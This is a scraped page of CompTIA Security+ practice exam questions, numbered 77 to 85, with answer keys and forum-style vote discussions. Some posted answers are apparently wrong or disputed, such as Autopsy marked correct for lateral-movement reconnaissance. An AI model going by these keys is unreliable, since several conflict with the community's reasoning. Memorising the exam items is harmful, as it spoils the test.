A memory snapshot also includes a memory state file (with extension .vmsn) that holds the memory of the VM at the time of the snapshot
capture. The size of the memory file and the time it takes to capture the memory state depends on the configured maximum memory for the
original/parent VM.
upvoted 1 times

  hackerguy 3 months, 1 week ago


Selected Answer: A
per dion training notes:

Type of backup primarily used to capture the entire operating system


image including all applications and data
§ Snapshots are also commonly used with virtualized systems
upvoted 1 times

  comeragh 5 months ago


Selected Answer: A
Agree with A snapshot being the correct answer here
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 138/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #77 Topic 1

After returning from a conference, a user's laptop has been operating slower than normal and overheating, and the fans have been running
constantly. During the diagnosis process, an unknown piece of hardware is found connected to the laptop's motherboard. Which of the following
attack vectors was exploited to install the hardware?

A. Removable media

B. Spear phishing

C. Supply chain

D. Direct access

Correct Answer: A

Community vote distribution


D (73%) A (27%)

  YusufMadkour Highly Voted  5 months, 1 week ago


Selected Answer: D
D because no hardware can be installed on the motherboard unless the perpetrator had direct access to the machine.
upvoted 21 times

  Sandon 2 weeks, 1 day ago


Or the supply chain
upvoted 1 times

  scarceanimal 15 hours, 24 minutes ago


that's not an attack vector
upvoted 1 times

  80drag 4 months, 1 week ago


but it doesnt say installed just connected. The usb connector is attached to the motherboard
upvoted 4 times

  TheDarkSide2405 2 weeks, 1 day ago


USB doesn't unknown piece of hardware
upvoted 2 times

  80drag 4 months, 1 week ago


I redact the previous statement
upvoted 2 times

  Boogie_79 Highly Voted  5 months, 1 week ago


Selected Answer: D
Direct access
upvoted 5 times

  DALLASCOWBOYS Most Recent  5 days, 22 hours ago


A. Removable media. They most likely received a USB stick and installed into the USB port which contained malware. There is no indication they
have direct access to the device.
upvoted 1 times

  DALLASCOWBOYS 5 days, 21 hours ago


the Direct Access will allow the attacker access to attack vectors, but the direct access is not itself an attack vector.
upvoted 1 times

  sanlibo 2 weeks, 2 days ago


Selected Answer: D
https://www.professormesser.com/security-plus/sy0-601/sy0-601-video/attack-vectors/
upvoted 1 times

  jhfdkjshfkjdsho 1 month, 2 weeks ago


Selected Answer: A
Removable media was inserted into the Motherboard directly. It doesn't mention there is direct access to some sensitive data
upvoted 2 times

  Kalender 2 months, 1 week ago

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 139/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Selected Answer: D
DIRECT-ACCESS ATTACKS
A direct-access attack is simply gaining physical access to the targeted computer system. This would enable the attacker to damage the
hardware and software, to install keyloggers, worms, viruses and covert listening devices or to manually copy sensitive information and data from
the device.
https://www.interelectronix.com/computer-security.html
upvoted 1 times

  okay123 2 months, 3 weeks ago


Selected Answer: D
D: Direct access to the motherboard
upvoted 1 times

  Jossie_C 3 months ago


Not necessarily removable media that was connected. Answer is D
upvoted 1 times

  Jossie_C 3 months ago


Selected Answer: D
In a direct-access attack, a person gains physical access to a computer and performs malicious actions including installing different types of
devices to compromise security, like operating system modifications, software worms, keyloggers or covert listening devices.
upvoted 2 times

  Knowledge33 3 months, 1 week ago


Selected Answer: A
Direct access is just that: the attacker has direct access to the system.
upvoted 2 times

  p610878 3 months, 1 week ago


Selected Answer: A
A direct access threat vector is when the attacker is able to directly control the targeted
system. This can take place through direct physical contact with the system’s keyboard or
may occur through a remote access connection.
upvoted 2 times

  Funt 3 months, 2 weeks ago


I may be the only one, but I believe it may be supply chain. If you have a compromised vendor that has tampered motherboards it would fit the
description.
upvoted 3 times

  HypeMan_crew 2 months, 2 weeks ago


This was my choice and I would have agreed to this as well but it seems the laptop has been working fine until after the conference. So I
would stick with direct access
upvoted 1 times

  Jossie_C 3 months ago


That's uncertain especially if the vendor is trusted...INCORRECT.
upvoted 1 times

  Gino_Slim 3 months, 2 weeks ago


Yeah bro, you're the only one. Over thought it.
upvoted 5 times

  emtpyspoon885 4 months, 1 week ago


Confused here "Direct Access" isn't in any of my study material
upvoted 2 times

  carpathia 4 months, 3 weeks ago


Selected Answer: A
This is a strange one. Connected to the motherboard sounds like direct access. Even though an USB stick is connected directly to the
motherboard... and then, who would open up a laptop to install hardware (where, there is no room). I sometimes see a separate USB controller
card inside laptops (hence USB stick is not directly connected to MB)... Vectors, can be Direct Access and Removable Media plus others and
they exclude eachother (pg 86 in a book I am studying for Sec+). Diagnosis process - well, a USB stick doesn't need a "diagnostic process"
cause it's pretty obvious, but from an official point of view it does. "I am sending th elaptop for diagnostic - wow, there is a USB stick attached to
it!"... What a finding!
upvoted 2 times

  Michelle2022 4 months, 4 weeks ago


Selected Answer: A
A is best answer to me because "an unknown piece of hardware is found connected to the laptop's motherboard."
upvoted 4 times

  [Removed] 5 months ago


Selected Answer: D

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 140/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Keyword here is VECTOR. The answer is D.


upvoted 2 times

  Gravoc 4 months, 2 weeks ago


Removable media is also an attack vector. I agree with D being the answer here, but wanted to clarify that the attack vector alone doesn't give
us an answer. Both are initiation points of attacks, therefore are attack vectors.
upvoted 2 times

  lordguck 3 months ago


If it was a usb dongle I would agree with you, but as the device is directly connected to the motherboard, it is not removeable anymore. I
think it is D, although C has some validity, too.
I go by the definition: In a direct-access attack, a person gains physical access to a computer and performs malicious actions including
installing different types of devices to compromise security, like operating system modifications, software worms, keyloggers or covert
listening devices.
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 141/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #78 Topic 1

After a recent security breach, a security analyst reports that several administrative usernames and passwords are being sent via cleartext across
the network to access network devices over port 23. Which of the following should be implemented so all credentials sent over the network are
encrypted when remotely accessing and configuring network devices?

A. SSH

B. SNMPv3

C. SFTP

D. Telnet

E. FTP

Correct Answer: A

Community vote distribution


A (100%)

  comeragh Highly Voted  5 months ago


Selected Answer: A
Telnet (port 23) is insecure and should be replaced with SSH (port 22)
upvoted 10 times

  [Removed] 5 months ago


Correct, SSH is the answer.
upvoted 2 times

  scarceanimal Most Recent  15 hours, 22 minutes ago


Selected Answer: A
ssh replaces telnet in that it provides an encrypted session. Telnet sends in clear text, unsecure.
upvoted 1 times

  DALLASCOWBOYS 5 days, 22 hours ago


A. SSH. SSH is an encryption protocol used to connect to systems.
upvoted 1 times

  Samsonite363 1 week, 2 days ago


Selected Answer: A
Easiest question in this guide.
upvoted 1 times

  rodwave 2 months, 3 weeks ago


Selected Answer: A
Answer: SSH (22)

Port 23 (Telnet) and Port 22 (SSH) are network protocols used to remotely access and manage systems however telnet does not encrypt the
connection so captured traffic appears in cleartext whereas an ssh connection would be encrypted.
=========================

SNMP (Simple Network Management Protocol) - is a protocol for collecting and organizing information about managed devices on networks.
Devices that typically support SNMP include servers/desktops, routers, switches, etc.

SFTP (Secure File Transfer Protocol) is a secure file transfer protocol that uses SSH encryption to securely sending and receiving file transfers.

FTP (File Transfer Protocol) - For file transfers


upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 142/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #79 Topic 1

Which of the following provides a calculated value for known vulnerabilities so organizations can prioritize mitigation steps?

A. CVSS

B. SIEM

C. SOAR

D. CVE

Correct Answer: A

Community vote distribution


A (100%)

  stoneface Highly Voted  5 months, 1 week ago


Selected Answer: A
CVSS is maintained by the Forum of Incident Response and Security Teams (first.org/cvss). CVSS metrics generate a score from 0 to 10 based
on characteristics of the vulnerability, such as whether it can be triggered remotely or needs local access, whether user intervention is required,
and so on
upvoted 9 times

  DALLASCOWBOYS Most Recent  5 days, 22 hours ago


A. CVSS. The Common Vulnerability Scoring System is an industry standard for assessing the severity of security vulnerabilities.
upvoted 1 times

  Jossie_C 3 months ago


Selected Answer: A
Common Vulnerability Scoring System
upvoted 1 times

  ExamTopicsDiscussor 4 months ago


CVSS stands for the correct
upvoted 1 times

  carpathia 4 months, 3 weeks ago


Selected Answer: A
"calculated" = CVSS
upvoted 1 times

  comeragh 5 months ago


Selected Answer: A
Agree with A - CVSS here as the correct answer
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 143/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #80 Topic 1

Several universities are participating in a collaborative research project and need to share compute and storage resources. Which of the following
cloud deployment strategies would BEST meet this need?

A. Community

B. Private

C. Public

D. Hybrid

Correct Answer: A

Community vote distribution


A (91%) 9%

  scarceanimal 15 hours, 18 minutes ago


Selected Answer: A
sharing infrastructure
upvoted 1 times

  DALLASCOWBOYS 5 days, 21 hours ago


A. Community Cloud Deployment, where tenants are limited to members of a specifically designed community. Community memberships is
normally based on a shared mission, similar security and compliance requirements, or other commonalities.
upvoted 1 times

  Astra10 1 week, 4 days ago


D. Hybrid cloud deployment strategy would BEST meet the need for universities participating in a collaborative research project to share
compute and storage resources. A hybrid cloud deployment allows organizations to use a combination of public and private cloud resources. In
this case, the universities can keep sensitive data on their private cloud while sharing the compute and storage resources on a public cloud. This
way, the universities can have the benefits of both the public and private cloud.

A. Community cloud deployment strategy is when multiple organizations share a cloud infrastructure, but the resources are only available to a
specific community of users.

B. Private cloud deployment strategy is when an organization builds and maintains a cloud infrastructure for its own use.

C. Public cloud deployment strategy is when an organization uses a cloud infrastructure provided by a third-party provider, available to the
general public.
upvoted 1 times

  bsComptia 2 weeks, 1 day ago


A community cloud deployment strategy, while it may be able to meet the need for sharing compute and storage resources among a group of
universities, would likely not be the best option. A community cloud is typically shared among organizations with similar security and compliance
requirements, and is often managed by a third-party provider. However, the level of control and customization offered by a community cloud may
be limited compared to a hybrid cloud deployment strategy, which combines elements of both public and private cloud deployment. This would
give the universities more control and flexibility in terms of how they manage and utilize their shared resources.
upvoted 1 times

  bsComptia 2 weeks, 1 day ago


how about this?
upvoted 1 times

  bsComptia 2 weeks, 1 day ago


A hybrid cloud deployment strategy is a combination of both private and public cloud deployment. This approach allows organizations to
take advantage of the benefits of both types of clouds, depending on their specific needs.

In a hybrid cloud deployment, sensitive and/or regulated data is kept on the private cloud, which provides a higher level of security and
compliance. Meanwhile, less sensitive workloads can be run on the public cloud, which allows for greater scalability and cost-
effectiveness. The two clouds are connected through secure, dedicated connections, such as VPNs, allowing for data and application
portability.

This deployment strategy allows organizations to take advantage of the benefits of both public and private clouds, depending on their
specific needs. It also allows organizations to reduce costs by using public cloud resources for non-sensitive workloads, and to improve
security by keeping sensitive data on the private cloud.
upvoted 1 times

  sanlibo 2 weeks, 2 days ago


Selected Answer: A

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 144/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

A community cloud is defined as a cloud infrastructure in which multiple organizations share resources and services based on common
operational and regulatory requirements.
upvoted 2 times
  tek7ila 2 months ago
Selected Answer: D
D - becouse they only share compute and storage - so they connect on presmise network with cloud - which they share.
upvoted 1 times

  Jossie_C 3 months ago


Selected Answer: A
Community is when different organizations share same stuff
upvoted 3 times

  nobodyridesforfree 3 months, 2 weeks ago


Selected Answer: A
Community (shared)
upvoted 1 times

  comeragh 5 months ago


Selected Answer: A
A - Community " share compute and storage resources"
upvoted 2 times

  varun0 5 months ago


Selected Answer: A
Community
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 145/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #81 Topic 1

A forensic analyst needs to prove that data has not been tampered with since it was collected. Which of the following methods will the analyst
MOST likely use?

A. Look for tampering on the evidence collection bag.

B. Encrypt the collected data using asymmetric encryption.

C. Ensure proper procedures for chain of custody are being followed.

D. Calculate the checksum using a hashing algorithm.

Correct Answer: D

Community vote distribution


D (62%) C (38%)

  stoneface Highly Voted  5 months, 1 week ago


Selected Answer: C
Procedure to establish the Chain of Custody

In order to assure the authenticity of the chain of custody, a series of steps must be followed. It is important to note that the more information
Forensic expert obtains concerning the evidence, the more authentic is the created chain of custody. You should ensure that the following
procedure is followed according to the chain of custody for electronic devices:

Save the original material


Take photos of the physical evidence
Take screenshots of the digital evidence.
Document date, time, and any other information on the receipt of the evidence.
Inject a bit-for-bit clone of digital evidence content into forensic computers.
Perform a hash test analysis to authenticate the working clone.
upvoted 12 times

  KetReeb 5 months ago


While your reasoning is a best practice, the only way to Prove the integrity of the data after its been handled is by verifying the checksum
(Answer D).
upvoted 23 times

  stoneface 5 months ago


I stand corrected -> D is correct - ensuring is not a method
upvoted 11 times

  KetReeb 5 months ago


I'm sorry stoneface, I have to retract my comment after running across the following in the all-in-one review: regarding checksums - A
disadvantage is that they miss larger numbers of errors as a second error can cancel the effect of the first on a checksum. Thus,
checksums serve no real purpose in digital forensics.
Your answer is best.
upvoted 9 times

  rodwave Highly Voted  2 months, 3 weeks ago


Selected Answer: D
Answer: Calculate the checksum using a hashing algorithm. (D)

A checksum is specifically intended to verify the integrity of data or find data corruption. Comparing a file's original and current checksum. And if
a byte or even a piece of the file's data has been changed, the original and current checksum will be different, and therefore you will know
whether it's the same file or not.
=====================
(A) - This is essentially the physical version of checking if something was tampered but wouldn't work for virtual data
(B) - Dont need to encrypt anything
(C) - Even if a proper chain of custody was followed, it doesn't guarantee that data hasn't been modified by anyone that had access to the data.
upvoted 11 times

  scarceanimal Most Recent  15 hours, 15 minutes ago


Selected Answer: D
A checksum on a file is a 'digital fingerprint' whereby even the smallest change to the file will cause the checksum to change completely.
Tampering will cause this change.
upvoted 1 times

  sarah2023 1 day, 16 hours ago


Selected Answer: C

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 146/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Chain of custody documentation reinforces the integrity and proper handling of evidence from collection, to analysis, to storage, and finally to
presentation. When security breaches go to trial, the chain of custody protects an organization against accusations that evidence has either been
tampered with or is different than it was when it was collected. Every person in the chain who handles evidence must log the methods and tools
they used.

CompTIA Security+ study guide


upvoted 1 times
  hanmai 2 days, 17 hours ago
An unbreakable chain of custody is crucial to the forensic investigation process; it’s proof that the digital evidence hasn’t been tampered with,
mishandled, or altered.
upvoted 1 times

  ronniehaang 4 days, 16 hours ago


Selected Answer: D
D. Calculate the checksum using a hashing algorithm.

A forensic analyst can prove that data has not been tampered with by using a hashing algorithm to calculate the checksum of the data. A
checksum is a small value calculated from the data that serves as a fingerprint of the data. If the checksum of the data changes, even by a single
bit, it indicates that the data has been altered. The analyst can compare the calculated checksum of the collected data with a known good value
to confirm that the data has not been tampered with. This method is widely used in digital forensics to ensure the integrity and authenticity of
collected evidence. Additionally, following proper procedures for chain of custody helps to maintain the integrity of the evidence and to provide a
clear record of who has had access to the evidence.
upvoted 1 times

  DALLASCOWBOYS 5 days, 21 hours ago


D. Checksum. Checksum is used to check the files for integrity.
upvoted 1 times

  ZDW 1 week, 5 days ago


the way I see it when you are wanting to prove it has not been modified you aren't going to simply show the chain of custody that doesn't prove
the data has not been manipulated you need to show the Hashes
upvoted 2 times

  ZDW 1 week, 5 days ago


another reason I say this is, it says "ensure the proper procedures are being followed" but if you're having to prove it, it's too late to ensure
they are doing what they should be doing. You need to prove it was done and showing the checksum/hash is how you would do that.
upvoted 1 times

  xxxdolorxxx 2 weeks, 1 day ago


Selected Answer: D
Answer is D.
Even if the proper chain of custody has been followed this doesn't "guarantee" it hasn't been changed. Someone could have changed it along
the chain. The check some is the only way to mathematically guarantee it hasn't been changed.
upvoted 3 times

  sanlibo 2 weeks, 2 days ago


Hashing is the simplest type of cryptographic operation. A cryptographic hashing
algorithm produces a fixed length string from an input plaintext that can be of any
length. The output can be referred to as a checksum, message digest, or hash, The
function is designed so that it is impossible to recover the plaintext data from the
digest (one-way) and so that different inputs are unlikely to produce the same output
(a collision).

The Official CompTIA Security+ Student Guide (Exam SY0-601) | 97


upvoted 1 times

  byfener 1 month, 2 weeks ago


Selected Answer: D
"needs to prove that data has not been tampered with since it was collected." Data was already collected, now he has to prove not tampered, so
he can only check the hash to prove...
upvoted 1 times

  jhfdkjshfkjdsho 1 month, 2 weeks ago


Selected Answer: D
Calculating checksum... There is no forensic... etc. in the question
upvoted 1 times

  Nirmalabhi 2 months ago


Selected Answer: D
dont get confused by the options. I ll go with option D
upvoted 1 times

  carpathia 2 months, 1 week ago


Selected Answer: C

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 147/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Actually checksums are not meant for this purpose ( https://www.professormesser.com/security-plus/sy0-601/sy0-601-video/managing-


evidence/ ). So, it should be Chain of Custody.
upvoted 1 times

  carpathia 2 months, 1 week ago


In other words D is a non statement as checksum is not a hash.
upvoted 1 times

  fzorsqqmdmsvfqvqdv 1 month, 3 weeks ago


checksums are used to verify INTEGRITY of the file. it's D.
upvoted 1 times

  viksap 2 months, 2 weeks ago


I think it's C
upvoted 1 times

  okay123 2 months, 2 weeks ago


Selected Answer: C
I am going to say C because this must be a trick question.

"Checksums have three main uses:

To know that a file has been correctly received from a content owner or source and then transferred successfully to preservation storage
To know that file fixity has been maintained when that file is being stored.
To be given to users of the file in the future so they know that the file has been correctly retrieved from storage and delivered to them.
This allows a ‘chain of custody’ to be established between those who produce or supply the digital materials, those responsible for its ongoing
storage, and those who need to use the digital material that has been stored."

So calculating checksum is part of the chain of custody process! preserving evidence and whatnot so, it must be C
upvoted 2 times

  carpathia 2 months, 3 weeks ago


Selected Answer: D
The keyword is Data here. That would imply a checksum.
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 148/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #82 Topic 1

Multiple business accounts were compromised a few days after a public website had its credentials database leaked on the Internet. No business
emails were identified in the breach, but the security team thinks that the list of passwords exposed was later used to compromise business
accounts. Which of the following would mitigate the issue?

A. Complexity requirements

B. Password history

C. Acceptable use policy

D. Shared accounts

Correct Answer: B

Community vote distribution


B (76%) C (24%)

  antster1000 Highly Voted  5 months ago


Don't really feel like any of the answers are sufficient. Would be looking for something like MFA for this.
upvoted 18 times

  stoneface Highly Voted  5 months ago


Selected Answer: B
Password reuse is an important concern in any organization. Many users want to reuse the same password for their account over a long period of
time.
upvoted 11 times

  DALLASCOWBOYS 5 days, 21 hours ago


Most Recent 
B. Password History. But hopefully the passwords were changed by the time the credentials were leaked. Would be the BEST answer of the
choices listed.
upvoted 1 times

  rodwave 2 months, 3 weeks ago


Selected Answer: B
Answer: Password History

Password history policies determines the number of unique new passwords that must associated with a user's account before an old password
be reused. Essentially forcing users to create new passwords on a regular basis.

For this situation, forcing users to use new unique passwords would somewhat mitigate the issue.
upvoted 4 times

  TinyTrexArmz 13 hours, 15 minutes ago


This also would prevent a user from using the same compromised password to quickly. Once the password is compromised hackers can try
the old password months later to see if the user was dumb enough to use it again.
upvoted 1 times

  bengy78 3 months ago


Selected Answer: C
It's an acceptable use policy violation. The users are using company passwords on external systems.
upvoted 4 times

  Jossie_C 3 months ago


Selected Answer: B
It's not the other three.
upvoted 3 times

  lordguck 3 months ago


Limited password lifetime or MFA would be the best answers here. Nevertheless I vote for A. My reasoning: The website pwd list was used for a
dictionary attack on the company. Complexitiy requirements would reduce the risk, that the password list produced "hits" on the companies'
accounts, which were not used on the hacked website.
upvoted 2 times

  DALLASCOWBOYS 5 days, 21 hours ago


I was thinking same, but if the passwords were leaked, the passwords would be able to be seen, the complexity would not matter. I think B is
the better choice, with the reasoning that hopefully passwords were changed by the time they were leaked.
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 149/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  CertAddict69 3 months, 3 weeks ago


Selected Answer: C
To me the Answer is C. Enforcing password history would not prevent the users from using the same password on multiple sites, which is what is
being implied here. An AUP (Acceptable Use Policy) Could at least hold users responsible for using the same password on multiple sites,
although would also not prevent them.
upvoted 2 times

  andrizo 3 months, 3 weeks ago


You're thinking of a group policy. AUPs are only for prohibited websites and apps for personal use.
upvoted 2 times

  FiendForce138 4 months, 1 week ago


Selected Answer: C
I agree with password history but I am not convinced the public website and the buisness accounts are linked to the same company or entity.
That said Password history controls would not come into play as neither entities would know of the others user password history. That said the
AUP would be able to address password reuse across unaffiliated accounts. That said the question is poorly worded and needs revision.
upvoted 1 times

  zf1343 1 week, 1 day ago


Password history relies on password expiration policy but we don't know if such policy exists! But the fact that they used company account
password in public sites, means current AUP policy (password section) needs to be added or updated.
upvoted 1 times

  comeragh 4 months, 1 week ago


I agree with Password History here. I was looking for MFA among the list of answers!
upvoted 1 times

  Jakalan7 4 months, 2 weeks ago


Selected Answer: B
MFA would be the optimal answer here, password reuse would be secondary - but since neither are available as answers, it has to be password
history.
upvoted 2 times

  varun0 5 months ago


Selected Answer: B
Looks like they're reusing the passwords
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 150/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #83 Topic 1

A security analyst wants to fingerprint a web server. Which of the following tools will the security analyst MOST likely use to accomplish this task?

A. nmap -pl-65535 192.168.0.10

B. dig 192.168.0.10

C. curl --head http://192.168.0.10

D. ping 192.168.0.10

Correct Answer: C

Community vote distribution


C (71%) A (29%)

  stoneface Highly Voted  5 months ago


Selected Answer: C
Agreed, for those wondering a curl --head 1.1.1.1 will output this :

HTTP/1.1 301 Moved Permanently


Server: cloudflare
Date: Thu, 01 Sep 2022 22:36:50 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Location: https://1.1.1.1/
CF-RAY: 74417cb04d6b9a50-MFE
upvoted 19 times

  TinyTrexArmz 12 hours, 56 minutes ago


While nmap can be used to fingerprint a webserver, those are not the right parameters to do so. You would use nmap -sV <target> not -
p<port-range>
upvoted 1 times

  Gravoc Highly Voted  4 months, 2 weeks ago


curl --head is similar to curl get. Remember from your studies that get is when a user/entity is requesting to get/download resources from a
server across the internet. Get requests include a header and a body. By doing curl --head, you're sending a request to get information from a
server. The server will reply by providing only the headers of the request, rather than including the body. Therefore a curl --head is a way to send
requests for header-only get requests. This allows people a quick summary of a response server, or in this case, to view it's fingerprint.
upvoted 9 times

  ronniehaang Most Recent  4 days, 16 hours ago


Selected Answer: A
The detailed analysis of services on a particular host is often called fingerprinting. This is because each OS or application software that underpins
a network service responds to probes in a unique way. This allows the scanning software to guess at the software name and version, without
having any sort of privileged access to the host. This can also be described as banner grabbing, where the banner is the header of the response
returned by the application.
Nmap is very widely used for this task, or you could use hping or Netcat.
upvoted 1 times

  ronniehaang 4 days, 16 hours ago


A security analyst would most likely use the tool "nmap" to fingerprint a web server. The command "nmap -p1-65535 192.168.0.10" will scan
the target IP address (192.168.0.10) for open ports, which can provide information about the web server software and operating system being
used. The tool nmap is commonly used for network exploration, security auditing, and finding open ports and services on a target system.
upvoted 1 times

  Sandon 2 weeks ago


Selected Answer: A
ChatGPT says it's A
upvoted 2 times

  P0wned 3 weeks, 2 days ago


Selected Answer: A
The security analyst will MOST likely use nmap -p1-65535 192.168.0.10 to fingerprint a web server.

nmap is a network exploration and security auditing tool that can be used to fingerprint a wide variety of network devices, including web servers.
The -p option tells nmap to scan only the specified ports (1-65535 in this case) rather than all ports. This command will give the analyst
information about the open ports and the services running on them.

dig is a command-line tool for querying DNS servers, it can give information about the DNS information but it doesn't fingerprint a web server.
https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 151/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Curl is a command-line tool for sending HTTP requests and it can give information about the HTTP headers, but it doesn't fingerprint a web
server.
Ping is a command-line tool for testing whether a particular host is reachable across an IP network, it can give information about reachability but
it doesn't fingerprint a web server.
upvoted 3 times

  bsComptia 2 weeks, 1 day ago


Agreed
A. nmap -pl-65535 192.168.0.10 is the most likely tool that a security analyst would use to fingerprint a web server. Nmap is a powerful tool
for network exploration, management, and security auditing, and can be used to fingerprint web servers to identify the operating system,
services running, and open ports.
Curl is a command-line tool for transferring data using various protocols, including HTTP. The `--head` option sends an HTTP request with the
`HEAD` method, which retrieves only the headers of the response, not the full response body. While this can provide some information about
the server, such as the server type, it is not as comprehensive as using a tool like nmap, which can provide more detailed information about
the server's operating system, services, and open ports.
Additionally, nmap can also be used to fingerprint the web server to identify the version of the web server software, and the available plugins,
which can be valuable information for identifying vulnerabilities and potential attack vectors.
upvoted 2 times

  Lars87 4 months, 3 weeks ago


Selected Answer: C
C 100%
upvoted 1 times

  comeragh 5 months ago


sorry on review it seems C would be a better answer.
upvoted 1 times

  varun0 5 months ago


Selected Answer: C
curl command shown outputs fingerprint which is type and version of web server.
upvoted 2 times

  comeragh 5 months ago


Selected Answer: A
I would go with A here - NMAP
upvoted 3 times

  KetReeb 5 months ago


the command syntax is not correct for nmap.
upvoted 5 times

  lordguck 3 months ago


The syntax is correct: map all port from 1-65535 on 192.168.0.10. C is correct as it is about a web server: Web server fingerprinting is the
task of identifying the type and version of web server that a target is running on.
upvoted 2 times

  zf1343 1 week ago


No, there is a typo in "nmap -pl-65535 x.x.x.x" command. If you replace letter "I" with 1 or omit it, then nmap will work as an active
fingerprinting tool to scan all web server ports. "Curl --head" will provide OS web server type if it's not behind a WAF.
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 152/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #84 Topic 1

A penetration tester was able to compromise an internal server and is now trying to pivot the current session in a network lateral movement.
Which of the following tools, if available on the server, will provide the MOST useful information for the next assessment step?

A. Autopsy

B. Cuckoo

C. Memdump

D. Nmap

Correct Answer: A

Community vote distribution


D (97%)

  stoneface Highly Voted  5 months, 1 week ago


Selected Answer: D
Autopsy is a digital forensics analysis tool - maily targetted to hard drive analysis - not very helpful for the requeriments

Nmap would be the correct answer. we want to pivot to another devices on the NETWORK, so next step is to do reconnaisance, port scanning,
etc
upvoted 18 times

  Demilitarized_zone Highly Voted  3 months, 1 week ago


WHY ARE THE ADMIN GIVING US WRONG ANSWERS PLEASE. THIS IS WICKED. COME ON
upvoted 15 times

  xxxdolorxxx Most Recent  2 weeks, 1 day ago


I vote for NMAP although I have no first hand experience with Autopsy.
upvoted 1 times

  mlonz 2 weeks, 2 days ago


"Which of the following tools, if available on the server " how come Nmap will be available on the server
upvoted 2 times

  jhfdkjshfkjdsho 1 month, 2 weeks ago


Selected Answer: A
Network Lateral Movement, or what is more commonly referred to simply as, “Lateral Movement”, refers to the techniques cyber attackers, or
“threat actors”, use to progressively move through a network as they search for the key data and assets that are ultimately the target of their
attack campaigns. So, It is not mapping the network
upvoted 1 times

  scarceanimal 15 hours, 5 minutes ago


the question calls for what the next step is not the defintion of network lateral movement
upvoted 1 times

  Sandon 2 weeks ago


It's not A
upvoted 3 times

  tek7ila 2 months ago


Selected Answer: D
The rest of answers make no sense.
upvoted 1 times

  Queenica 2 months, 1 week ago


I chose NMAP, however how useful will NMAP be as the Pen-Tester is already INSIDE the network.
upvoted 1 times

  JaMorant 5 days, 8 hours ago


nmap helps with recon
upvoted 1 times

  rindrasakti 3 months, 3 weeks ago


Selected Answer: D
How come the answer is A. who answer that?? come on man... Autopsy is a digital forensics analysis tool.. I vote for D
upvoted 1 times
https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 153/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  TinyTrexArmz 12 hours, 45 minutes ago


You can ignore the right answer as marked by the website. They would get into some trouble if they had all the right answers for you to grab.
Instead they have decent questions and promote discussion by us to come up with the correct answer.
upvoted 1 times

  Gravoc 4 months, 2 weeks ago


Nmap is basically mapping a network. The purpose of lateral pivoting is to gain a new perspective, or new information that will allow you to either
privilege escalate, or to achieve the goal of the attack. If the compromised server the pen tester is exploiting has nmap enabled, the pen tester
will be able to get an in-depth inside view of the internal network structure.

Autopsy doesn't make sense. It's used by forensics investigators to analyze tapes, drives, and save states. Why would a server have autopsy,
and how would autopsy assist in determining the next lateral move? It doesn't.
upvoted 2 times

  k9_462 5 months ago


Selected Answer: D
this is Nmap
upvoted 1 times

  Boogie_79 5 months ago


Selected Answer: D
Nmap specifically provides support for Network lateral movement activities.
upvoted 3 times

  kmanb 5 months, 1 week ago


Selected Answer: D
“Network lateral movement” nmap will help with that
upvoted 2 times

  YusufMadkour 5 months, 1 week ago


Selected Answer: D
Autopsy makes no sense in the context of assessing the next step. Nmap makes more sense as the pentester can use it to scan other devices on
the network to move laterally towards their target.
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 154/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #85 Topic 1

Field workers in an organization are issued mobile phones on a daily basis. All the work is performed within one city, and the mobile phones are
not used for any purpose other than work. The organization does not want these phones used for personal purposes. The organization would like
to issue the phones to workers as permanent devices so the phones do not need to be reissued every day. Given the conditions described, which
of the following technologies would BEST meet these requirements?

A. Geofencing

B. Mobile device management

C. Containerization

D. Remote wiping

Correct Answer: B

Community vote distribution


B (100%)

  stoneface Highly Voted  5 months, 1 week ago


Selected Answer: B
MDM is the best solution here, Company wants to issue a COBO device therefore no containerization < - tailored to BYOD

Geofencing and remote wiping are capabilites that are provided by an MDM solution
upvoted 7 times

